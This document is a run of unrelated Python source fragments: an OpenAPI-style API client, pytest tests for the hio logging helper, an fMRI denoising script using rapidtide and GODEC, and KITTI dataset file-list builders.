return_data = self.deserialize(response_data, response_type) else: return_data = None if _return_http_data_only: return return_data else: return return_data, response_data.status_code, response_data.headers def __handle_path_params( self, resource_path: str, path_params: Union[Dict[str, Union[str, int]], List[Tuple], None], collection_formats: Optional[Dict[str, str]], ) -> str: path_params_sanitized = self.sanitize_for_serialization(path_params) path_params_tuples = self.parameters_to_tuples( path_params_sanitized, collection_formats ) for k, v in path_params_tuples: # specified safe chars, encode everything resource_path = resource_path.replace( f"{{{k}}}", quote(str(v), safe=self.configuration.safe_chars_for_path_param), ) return resource_path def __handle_query_params( self, query_params: Union[Dict[str, Union[str, int]], List[Tuple], None], collection_formats: Optional[Dict[str, str]], ) -> str: query_params_sanitized = self.sanitize_for_serialization(query_params) query_params_tuples = self.parameters_to_tuples( query_params_sanitized, collection_formats ) return "&".join(["=".join(param) for param in query_params_tuples]) def sanitize_for_serialization(self, obj: Any) -> Any: """Build a JSON POST object. Based on the object type, this method returns the sanitized JSON representation to send to the server: * If obj is ``None``, return ``None``. * If obj is ``str``, ``int``, ``float`` or ``bool``, return directly. * If obj is :class:`datetime.datetime` or :class:`datetime.date`, convert to string in ``iso8601`` format. * If obj is ``list``, sanitize each element in the ``list``. * If obj is ``tuple``, sanitize each element in the ``tuple``. * If obj is ``dict``, return the ``dict``. * If obj is an OpenAPI model, return the ``properties`` ``dict``. Parameters ---------- obj : DeserializedType Data to sanitize and serialize. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... client.sanitize_for_serialization({'key': 'value'}) {'key': 'value'} >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... client.sanitize_for_serialization(datetime.datetime(2015, 10, 21, 10, 5, 10)) '2015-10-21T10:05:10' """ if obj is None: return None elif isinstance(obj, self.PRIMITIVE_TYPES): return obj elif isinstance(obj, list): return [self.sanitize_for_serialization(sub_obj) for sub_obj in obj] elif isinstance(obj, tuple): return tuple(self.sanitize_for_serialization(sub_obj) for sub_obj in obj) elif isinstance(obj, (datetime.datetime, datetime.date)): return obj.isoformat() if isinstance(obj, dict): obj_dict = obj else: obj_dict = { obj.attribute_map[attr]: getattr(obj, attr) for attr in obj.swagger_types if getattr(obj, attr) is not None } return { key: self.sanitize_for_serialization(val) for key, val in obj_dict.items() } def deserialize( self, response: requests.Response, response_type: str ) -> DeserializedType: """Deserialize the response into an object. Based on the type of response, the appropriate object is created for use. For responses that are in JSON format, this method processes the response and returns it: * If ``response_type`` is ``file``, save the content to a temporary file and return the file name. * If ``response_type`` is :class:`datetime.datetime` or :class:`datetime.date`, parse the string and return the ``datetime`` object. * If ``response_type`` is ``list``, recursively deserialize the list contents. * If ``response_type`` is ``dict``, recursively deserialize the dictionary keys and values. * If ``response_type`` is the name of an OpenAPI model, return the model object. Parameters ---------- response : requests.Response Response object received from the API. response_type : str String name of the class represented. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... api_response = requests.Response() ... api_response._content = b"{'key': 'value'}" ... client.deserialize(api_response, 'Dict[str, str]]') {'key': 'value'} >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... api_response = requests.Response() ... api_response._content = b"'2015-10-21T10:05:10'" ... client.deserialize(api_response, 'datetime.datetime') datetime.datetime(2015, 10, 21, 10, 5, 10) """ if response_type == "file": return self.__deserialize_file(response) if response_type == "str": data: SerializedType = response.text else: try: data = response.json() except ValueError: data = response.content return self.__deserialize(data, response_type) def __deserialize(self, data: SerializedType, klass_name: str) -> DeserializedType: """Deserialize ``dict``, ``list``, and ``str`` into an object. Parameters ---------- data : Union[dict, list, str] Response data to deserialize. klass_name : str Type of object to deserialize the data to. The type can be a: * String class name * String type definition for list or dictionary """ if data is None: return None list_match = re.match(r"list\[(.*)]", klass_name) if list_match is not None: assert isinstance(data, list) sub_kls = list_match.group(1) return [self.__deserialize(sub_data, sub_kls) for sub_data in data] dict_match = re.match(r"dict\(([^,]*), (.*)\)", klass_name) if dict_match is not None: assert isinstance(data, dict) sub_kls = dict_match.group(2) return {k: self.__deserialize(v, sub_kls) for k, v in data.items()} if klass_name in self.NATIVE_TYPES_MAPPING: klass = self.NATIVE_TYPES_MAPPING[klass_name] else: klass = self.models[klass_name] if klass in self.PRIMITIVE_TYPES: assert isinstance(data, (str, int, float, bool, bytes)) return self.__deserialize_primitive(data, klass) elif klass == datetime.date: assert isinstance(data, str) return self.__deserialize_date(data) elif klass == datetime.datetime: assert isinstance(data, str) return self.__deserialize_datetime(data) else: assert isinstance(data, dict) return self.__deserialize_model(data, klass) def call_api( self, resource_path: str, method: str, path_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, query_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, header_params: Union[Dict[str, Union[str, int]], None] = None, body: Optional[DeserializedType] = None, post_params: Optional[List[Tuple]] = None, files: Optional[Dict[str, str]] = None, response_type: Optional[str] = None, _return_http_data_only: Optional[bool] = None, collection_formats: Optional[Dict[str, str]] = None, _preload_content: bool = True, _request_timeout: Union[float, Tuple[float], None] = None, ) -> Union[requests.Response, DeserializedType, None]: """Make the HTTP request and return the deserialized data. Parameters
# -*- encoding: utf-8 -*- """ tests.help.test_ogling module """ import pytest import os import logging from hio import hioing from hio import help from hio.help import ogling def test_openogler(): """ Test context manager openOgler """ # used context manager to directly open an ogler Because loggers are singletons # it still affects loggers. with ogling.openOgler(level=logging.DEBUG) as ogler: # default is temp = True assert isinstance(ogler, ogling.Ogler) assert ogler.name == "test" assert ogler.level == logging.DEBUG assert ogler.temp == True assert ogler.prefix == 'hio' assert ogler.headDirPath == ogler.HeadDirPath == "/usr/local/var" assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n' 'hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') assert not ogler.opened help.ogler.resetLevel(level=help.ogler.level) with ogling.openOgler(name='mine', temp=False, level=logging.DEBUG) as ogler: assert isinstance(ogler, ogling.Ogler) assert ogler.name == "mine" assert ogler.level == logging.DEBUG assert ogler.temp == False assert ogler.prefix == 'hio' assert ogler.headDirPath == ogler.HeadDirPath == "/usr/local/var" assert ogler.dirPath == "/usr/local/var/hio/logs" assert ogler.path == '/usr/local/var/hio/logs/mine.log' assert ogler.opened # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n' 'hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') assert not ogler.opened assert os.path.exists(ogler.path) os.remove(ogler.path) assert not os.path.exists(ogler.path) help.ogler.resetLevel(level=help.ogler.level) """End Test""" def test_ogler(): """ Test Ogler class instance that builds loggers """ ogler = ogling.Ogler(name="test", ) assert ogler.path is None assert ogler.opened == False assert ogler.level == logging.ERROR # default is ERROR assert ogler.dirPath == None assert ogler.path == None # logger console: Only Error should log because level ERROR # logger file: Nothing should log because .path not created logger = ogler.getLogger() assert len(logger.handlers) == 2 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") ogler.level = logging.DEBUG # logger console: All should log because level DEBUG # logger file: nothing should log because .path still not created logger = ogler.getLogger() logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") # create ogler with opened path ogler = ogling.Ogler(name="test", level=logging.DEBUG, temp=True, reopen=True, clear=True) assert ogler.level == logging.DEBUG assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') ogler.temp = False # trick it to not clear on close ogler.close() # but do not clear assert os.path.exists(ogler.path) assert ogler.opened == False ogler.temp = True # restore state # Test reopen but not clear so file still there ogler.reopen(temp=True) assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n' 'hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') path = ogler.path ogler.close(clear=True) assert not os.path.exists(path) assert ogler.opened == False # test selective ogler handlers with pytest.raises(hioing.OglerError): ogler = ogling.Ogler(name="test", consoled=False, syslogged=False, filed=False) # Only console # create ogler with opened path ogler = ogling.Ogler(name="test", level=logging.DEBUG, temp=True, reopen=True, clear=True, syslogged=False, filed=False) assert ogler.level == logging.DEBUG assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 1 assert logger.handlers[0] == ogler.baseConsoleHandler logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # Only file # create ogler with opened path ogler = ogling.Ogler(name="test", level=logging.DEBUG, temp=True, reopen=True, clear=True, syslogged=False, consoled=False) assert ogler.level == logging.DEBUG assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 1 assert logger.handlers[0] == ogler.baseFileHandler logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') path = ogler.path ogler.close(clear=True) assert not os.path.exists(path) assert ogler.opened == False help.ogler = ogling.initOgler() # reset help.ogler to defaults """End Test""" def test_init_ogler(): """ Test initOgler function for ogler global """ #defined by default in help.__init__ on import of ogling assert isinstance(help.ogler, ogling.Ogler) assert not help.ogler.opened assert help.ogler.level == logging.CRITICAL # default assert help.ogler.dirPath == None assert help.ogler.path == None # nothing should log to file because .path not created and level critical # # nothing should log to console because level critical logger = help.ogler.getLogger() assert len(logger.handlers) == 2 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") help.ogler.level = logging.DEBUG # nothing should log because .path not created despite loggin level debug logger = help.ogler.getLogger() assert len(logger.handlers) == 2 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") #reopen ogler to create path help.ogler.reopen(temp=True, clear=True) assert help.ogler.opened assert help.ogler.level == logging.DEBUG assert help.ogler.dirPath.startswith("/tmp/hio/logs/test_") assert help.ogler.dirPath.endswith("_temp") assert help.ogler.path.endswith("/main.log") logger = help.ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test
<gh_stars>1-10 """ Perform standard denoising (not TE-dependent denoising). Methods: - Global signal regression with custom code (integrated in tedana, but we do it separately here because the approach is very different) - Dynamic global signal regression with rapidtide - aCompCor with custom code - GODEC with the ME-ICA/godec package - RVT (with lags) regression - RV (with lags) regression """ import argparse import json import os import os.path as op from glob import glob import numpy as np import pandas as pd import rapidtide from nilearn import image from processing_utils import _generic_regression, run_command def run_rvtreg(medn_file, mask_file, confounds_file, out_dir): """Clean MEDN data with regression model including RVT and RVT*RRF (plus lags). Parameters ---------- medn_file mask_file confounds_file out_dir Notes ----- Used for: - Carpet plots of MEDN after regression of RVT + RVT*RRF (S5) - Scatter plot of MEDN-RVT+RVT*RRF SD of global signal against SD of ventilatory envelope (RPV) (S8). """ print("\tRVT", flush=True) # Parse input files medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") medn_json_file = medn_file.replace(".nii.gz", ".json") # Determine output files denoised_file = op.join(out_dir, f"{prefix}_desc-RVTReg_bold.nii.gz") noise_file = op.join(out_dir, f"{prefix}_desc-RVTReg_errorts.nii.gz") confounds_df = pd.read_table(confounds_file) # Load metadata for writing out later and TR now with open(medn_json_file, "r") as fo: json_info = json.load(fo) nuisance_regressors = confounds_df[ [ "RVTRegression_RVT", "RVTRegression_RVT+5s", "RVTRegression_RVT+10s", "RVTRegression_RVT+15s", "RVTRegression_RVT+20s", "RVTRegression_RVT*RRF", "RVTRegression_RVT*RRF+5s", "RVTRegression_RVT*RRF+10s", "RVTRegression_RVT*RRF+15s", "RVTRegression_RVT*RRF+20s", "trans_x", "trans_y", "trans_z", "rot_x", "rot_y", "rot_z", "trans_x_derivative1", "trans_y_derivative1", "trans_z_derivative1", "rot_x_derivative1", "rot_y_derivative1", "rot_z_derivative1", ] ].values # Some fMRIPrep nuisance regressors have NaN in the first row (e.g., derivatives) nuisance_regressors = np.nan_to_num(nuisance_regressors, 0) denoised_img, noise_img = _generic_regression( medn_file, mask_file, nuisance_regressors, t_r=json_info["RepetitionTime"], ) # Save output files denoised_img.to_filename(denoised_file) noise_img.to_filename(noise_file) # Create json files with Sources and Description fields json_info["Sources"] = [medn_file, mask_file, confounds_file] SUFFIXES = { "desc-RVTReg_bold": ( "Multi-echo denoised data further denoised with a respiratory-volume-per-time-based " "regression model. This model includes RVT lagged 0 seconds, 5 seconds forward, " "10 seconds forward, 15 seconds forward, and 20 seconds forward, " "along with those five RVT-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), "desc-RVTReg_errorts": ( "Residuals from respiratory-volume-per-time-based regression model applied to " "multi-echo denoised data. This model includes RVT lagged 0 seconds, " "5 seconds forward, 10 seconds forward, 15 seconds forward, and 20 seconds forward, " "along with those three RV-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), } for suffix, description in SUFFIXES.items(): nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz") assert op.isfile(nii_file) suff_json_file = op.join(out_dir, f"{prefix}_{suffix}.json") json_info["Description"] = description with open(suff_json_file, "w") as fo: json.dump(json_info, fo, sort_keys=True, indent=4) def run_rvreg(medn_file, mask_file, confounds_file, out_dir): """Clean MEDN data with regression model including RV and RV*RRF (plus lags). Parameters ---------- medn_file mask_file confounds_file out_dir Notes ----- Used for: - Carpet plots of MEDN after regression of RV + RV*RRF (S5) - Scatter plot of MEDN-RV+RV*RRF SD of global signal against SD of ventilatory envelope (RPV) (S8). """ print("\tRV", flush=True) # Parse input files medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") medn_json_file = medn_file.replace(".nii.gz", ".json") # Determine output files denoised_file = op.join(out_dir, f"{prefix}_desc-RVReg_bold.nii.gz") noise_file = op.join(out_dir, f"{prefix}_desc-RVReg_errorts.nii.gz") confounds_df = pd.read_table(confounds_file) # Load metadata for writing out later and TR now with open(medn_json_file, "r") as fo: json_info = json.load(fo) nuisance_regressors = confounds_df[ [ "RVRegression_RV-3s", "RVRegression_RV", "RVRegression_RV+3s", "RVRegression_RV*RRF-3s", "RVRegression_RV*RRF", "RVRegression_RV*RRF+3s", "trans_x", "trans_y", "trans_z", "rot_x", "rot_y", "rot_z", "trans_x_derivative1", "trans_y_derivative1", "trans_z_derivative1", "rot_x_derivative1", "rot_y_derivative1", "rot_z_derivative1", ] ].values # Some fMRIPrep nuisance regressors have NaN in the first row (e.g., derivatives) nuisance_regressors = np.nan_to_num(nuisance_regressors, 0) denoised_img, noise_img = _generic_regression( medn_file, mask_file, nuisance_regressors, t_r=json_info["RepetitionTime"], ) # Save output files denoised_img.to_filename(denoised_file) noise_img.to_filename(noise_file) # Create json files with Sources and Description fields json_info["Sources"] = [medn_file, mask_file, confounds_file] SUFFIXES = { "desc-RVReg_bold": ( "Multi-echo denoised data further denoised with a respiratory variance-based " "regression model. This model includes RV lagged 3 seconds back, 0 seconds, " "3 seconds forward, along with those three RV-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), "desc-RVReg_errorts": ( "Residuals from respiratory variance-based regression model applied to multi-echo " "denoised data. This model includes RV lagged 3 seconds back, 0 seconds, " "3 seconds forward, along with those three RV-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), } for suffix, description in SUFFIXES.items(): nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz") assert op.isfile(nii_file) suff_json_file = op.join(out_dir, f"{prefix}_{suffix}.json") json_info["Description"] = description with open(suff_json_file, "w") as fo: json.dump(json_info, fo, sort_keys=True, indent=4) def run_dgsr(medn_file, mask_file, confounds_file, out_dir): """Run dynamic global signal regression with rapidtide. Parameters ---------- medn_file mask_file confounds_file out_dir Notes ----- Used for: - Carpet plots of MEDN after dGSR (3, S12) - QC:RSFC plot of MEDN after dGSR with motion as QC (4, 5, S10, S13) - S10 involves censoring FD>0.2mm - QC:RSFC plot of MEDN after dGSR with RPV as QC (5) - High-low motion plot of MEDN after dGSR (4, S10) - S10 involves censoring FD>0.2mm - Scrubbing plot of MEDN after dGSR (4) - Mean correlation matrix and histogram of MEDN after dGSR (S13) - Correlation scatterplot of MEDN after dGSR against other MEDN outputs (S13) - Scatter plot of MEDN-dGSR SD of global signal against SD of ventilatory envelope (RPV) (not in paper). """ print("\trapidtide", flush=True) # I don't trust that tedana will retain the TR in the nifti header, # so will extract from json directly. medn_json_file = medn_file.replace(".nii.gz", ".json") with open(medn_json_file, "r") as fo: json_info = json.load(fo) t_r = json_info["RepetitionTime"] medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") dgsr_file = op.join(out_dir, f"{prefix}_desc-lfofilterCleaned_bold.nii.gz") dgsr_noise_file = op.join(out_dir, f"{prefix}_desc-lfofilterCleaned_errorts.nii.gz") # Use the standard denoising settings, with a smoothing kernel equal to 1/2 voxel size, # per rapidtide's recommendation. cmd = ( f"rapidtide --denoising --datatstep {t_r} " f"--motionfile {confounds_file} --denoising --spatialfilt -1 " f"{medn_file} {op.join(out_dir, prefix)}" ) run_command(cmd) # Per the rapidtide documentation, the lfofilterCleaned data have mean included. dgsr_noise_img = image.math_img("img1 - img2", img1=medn_file, img2=dgsr_file) dgsr_noise_img.to_filename(dgsr_noise_file) # Create json files with Sources and Description fields json_info["Sources"] = [medn_file, confounds_file] SUFFIXES = { "desc-lfofilterCleaned_bold": "Multi-echo denoised data further denoised with rapidtide.", "desc-lfofilterCleaned_errorts": ( "Noise time series retained from further denoising multi-echo denoised data with " "rapidtide." ), } for suffix, description in SUFFIXES.items(): nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz") assert op.isfile(nii_file) suff_json_file = op.join(out_dir, f"{prefix}_{suffix}.json") json_info["Description"] = description with open(suff_json_file, "w") as fo: json.dump(json_info, fo, sort_keys=True, indent=4) def run_godec(medn_file, mask_file, out_dir): """Still need to test a bit. Parameters ---------- medn_file mask_file Brain mask. out_dir Notes ----- From the original paper's appendix (page 4): > Our implementation of GODEC is Python-based (godec.py), and included a random sampling > method to estimate the covariance matrix iteratively with a power method as described > below. We also included steps of discrete wavelet transform before and after GODEC to > conserve autocorrelation in the final solution, using the Daubechies wavelet. > A rank-1 approximation was used, with 100 iterations. > ... > We used parameters that returned low-rank spaces with rank approximately of 1-4 to > minimize removal of signals associated with resting state networks. Used for: - Carpet plots of MEDN after GODEC (3, S9, S12) - QC:RSFC plot of MEDN after GODEC with motion as QC (4, 5, S10, S13) - S10 involves censoring FD>0.2mm - QC:RSFC plot of MEDN after GODEC with RPV as QC (5) - High-low motion plot of MEDN after GODEC (4, S10) - S10 involves censoring FD>0.2mm - Scrubbing plot of MEDN after GODEC (4) - Mean correlation matrix and histogram of MEDN after GODEC (S13) - Correlation scatterplot of MEDN after GODEC against other MEDN outputs (S13) - Scatter plot of MEDN-GODEC SD of global signal against SD of ventilatory envelope (RPV) (2). """ print("\tgodec", flush=True) from godec import godec_fmri # Parse input files medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") medn_json_file = medn_file.replace(".nii.gz", ".json") godec_fmri( medn_file, mask_file, out_dir, prefix=prefix, method="greedy", ranks=[4], norm_mode="vn", rank_step_size=1, iterated_power=100, wavelet=True, ) # Load metadata with open(medn_json_file, "r") as fo: json_info = json.load(fo) # Create json files
odometry set, seq. 8 is not available in the raw data frame_min_max_sequence = [[0, 270], [0, 2760], [0, 1100], [0, 1100], [1100, 5170], [0, 1590], [0, 1200], [0, 4540], [0, 4660], [0, 1100]] # get the poses from file for min_max, file in zip(frame_min_max_sequence, files): for i in range(min_max[0], min_max[1] + 1, 1): frame_numbers.append(i) drive = file.split(os.sep)[-3] for i in range(min_max[0], min_max[1] + 1, 1): drives.append(drive) pose = np.loadtxt(file).reshape((-1, 3, 4)) for p in pose: p = list(p) p = [list(i) for i in p] poses.append(p) counter = 0 positions = [] files = [] # get the corresponding filenames and positions from the poses lower_limit = [0] upper_limit = [] old_frame_number = None new_frame_number = None for i, number in zip(range(len(frame_numbers)), frame_numbers): old_frame_number = new_frame_number new_frame_number = number if old_frame_number != new_frame_number - 1 and old_frame_number is not None: upper_limit.append(i - 1) lower_limit.append(i) upper_limit.append(len(frame_numbers) - 1) index = 0 # append the values of positions and files to the data dict for i, file in zip(range(len(main_files)), main_files): main_drive = file.split(os.sep)[-4] main_frame_number = int(os.path.splitext(os.path.split(file)[1])[0]) if main_drive == drives[counter] and main_frame_number == frame_numbers[counter]: temp_position = (main_files.index(file), counter - lower_limit[index], upper_limit[index] - counter, counter) positions.append(temp_position) files.append(file_list[0][main_files.index(file)]) counter += 1 if index < len(lower_limit) - 1 and counter == lower_limit[index + 1]: index += 1 if counter == len(frame_numbers): break print('poses:', len(poses)) position_list.append(positions) file_list.append(files) numerical_list.append(poses) folders_list.append(folders) # save the json dict json_list.update({'folders': folders_list, 'files': file_list, 'positions': position_list, 'numerical_values': numerical_list}) self.json_dict = json_list class KITTI2015FilelistCreator(FilelistCreator): """Class to create the KITTI file list""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def create_json_from_list(self, json_list, stereo_replace): """Creates a dictionary in the format of the basic_files.json. Takes a dictionary with the dataset-specific names and file endings and fills the dictionary self.json_dict with the entries from the dataset folder based on the information in the given dictionary. :param json_list: dataset-spicific dictionary of the form {'names: [list of all data categories that this dataset provides, e.g. 'color', 'depth', ...], 'types': [list of the corresponding file types, e.g. '.png', '.txt', ...], 'filters': [list of the corresponding filters to identify the folders for each name, e.g. 'camera', ...]} :param stereo_replace: dicionary that defines the strings that have to be interchanged in order to get the right stereo image from the left stereo image: {left_image_string: right_image_string} """ folders_list = [] file_list = [] position_list = [] numerical_list = [] main_files = [] for i, name, type, filter in zip(range(len(json_list['names'])), json_list['names'], json_list['types'], json_list['filters']): folders, files = self.create_filelist(filter, type) folders_list.append(folders) file_list.append(files) positions = [] lower_limit = [0] upper_limit = [] old_frame_number = None new_frame_number = None for file in files: old_frame_number = new_frame_number new_frame_number = int(os.path.splitext(os.path.split(file)[1])[0].split('_')[1]) if old_frame_number != new_frame_number - 1 and old_frame_number is not None: upper_limit.append(files.index(file) - 1) lower_limit.append(files.index(file)) upper_limit.append(len(files) - 1) index = 0 for j, file in zip(range(len(files)), files): folder = os.path.split(os.path.split(os.path.split(file)[0])[0])[1] file = os.path.split(file)[1] file = os.path.join(folder, file) if index < len(lower_limit) - 1 and j == lower_limit[index + 1]: index += 1 if i == 0: positions.append((len(positions), j - lower_limit[index], upper_limit[index] - j, j)) main_files.append(file) else: if 'right' in name: for key in stereo_replace.keys(): file = file.replace(stereo_replace[key], key) positions.append((main_files.index(file), j - lower_limit[index], upper_limit[index] - j, j)) position_list.append(positions) numerical_list.append(None) print('name: ', name, 'num_items: ', len(files)) # camera intrinsic parameters camera_intrinsics = [] camera_intrinsics_right = [] json_list['names'].extend(['camera_intrinsics', 'camera_intrinsics_right']) json_list['types'].extend(['.txt', '.txt']) json_list['filters'].extend(['calib_cam_to_cam', 'calib_cam_to_cam']) for file in main_files: base = file.split(os.sep)[1].split('_')[0] folder = file.split(os.sep)[0] param_file_name = base + '.txt' calib_file = os.path.join(self.dataset_path, folder, 'calib_cam_to_cam', param_file_name) left = open(calib_file).readlines()[:20][-1][6:].split() right = open(calib_file).readlines()[:28][-1][6:].split() left_matrix = np.eye(4) right_matrix = np.eye(4) left_matrix[:3, :3] = np.array([float(l) for l in left]).reshape((3, 3)) right_matrix[:3, :3] = np.array([float(r) for r in right]).reshape((3, 3)) left_matrix = list(left_matrix) right_matrix = list(right_matrix) left_matrix = [list(l) for l in left_matrix] right_matrix = [list(r) for r in right_matrix] camera_intrinsics.append(left_matrix) camera_intrinsics_right.append(right_matrix) print('camera_intrinsics:', len(camera_intrinsics)) print('camera_intrinsics_right:', len(camera_intrinsics_right)) folders_list.extend([folders_list[0], folders_list[1]]) position_list.extend([position_list[0], position_list[0]]) file_list.extend([file_list[0].copy(), file_list[1].copy()]) numerical_list.extend([camera_intrinsics, camera_intrinsics_right]) json_list.update({'folders': folders_list, 'files': file_list, 'positions': position_list, 'numerical_values': numerical_list}) self.json_dict = json_list class VirtualKITTIFilelistCreator(FilelistCreator): """Class to create the Virtual KITTI file list""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def create_json_from_list(self, json_list, stereo_replace=None): """Creates a dictionary in the format of the basic_files.json. Takes a dictionary with the dataset-specific names and file endings and fills the dictionary self.json_dict with the entries from the dataset folder based on the information in the given dictionary. :param json_list: dataset-spicific dictionary of the form {'names: [list of all data categories that this dataset provides, e.g. 'color', 'depth', ...], 'types': [list of the corresponding file types, e.g. '.png', '.txt', ...], 'filters': [list of the corresponding filters to identify the folders for each name, e.g. 'camera', ...]} :param stereo_replace: Not used for this Dataset """ folders_list = [] file_list = [] position_list = [] numerical_list = [] main_files = [] for i, name, type, filter in zip(range(len(json_list['names'])), json_list['names'], json_list['types'], json_list['filters']): folders, files = self.create_filelist(filter, type) folders_list.append(folders) file_list.append(files) # positions contains 4-tuples, where the single entries have the following meaning: # 1. global position inside the dataset (sorted by frame number and sequence # 2. number of preceding frames in the sequence # 3. number of frames in the sequence after the current frame # 4. local position inside the list of the elements (e.g. depth has 20000 elements but color has 40000 # then the first entry will contain the mapping from depth to color and the fourth entry will contain # numbers from 0 to 20000 positions = [] lower_limit = [0] # Array containing the index of the starting frames for each video upper_limit = [] # Array containing the index of the end frame for each video old_frame_number = None new_frame_number = None # get the sequence limits (upper and lower) for file in files: old_frame_number = new_frame_number new_frame_number = int(os.path.splitext(os.path.split(file)[1])[0]) # detect start of a new video if old_frame_number != new_frame_number - 1 and old_frame_number is not None: upper_limit.append(files.index(file) - 1) lower_limit.append(files.index(file)) upper_limit.append(len(files) - 1) index = 0 # get the position entries and the file names of all image files, numerical values are handled # differently for j, file in zip(range(len(files)), files): file = file.split(self.dataset_path + os.sep)[1] file = os.path.join(*file.split(os.sep)[1:]) # detect start of a new video if index < len(lower_limit) - 1 and j == lower_limit[index + 1]: index += 1 if i == 0: positions.append((len(positions), j - lower_limit[index], upper_limit[index] - j, j)) main_files.append(file) else: positions.append((main_files.index(file), j - lower_limit[index], upper_limit[index] - j, j)) position_list.append(positions) numerical_list.append(None) print('name: ', name, 'num_items: ', len(files)) json_list.update({'folders': folders_list, 'files': file_list, 'positions': position_list, 'numerical_values': numerical_list}) self.json_dict = json_list class CityscapesFilelistCreator(FilelistCreator): """Class to create the Cityscapes file list""" def __init__(self, *args, 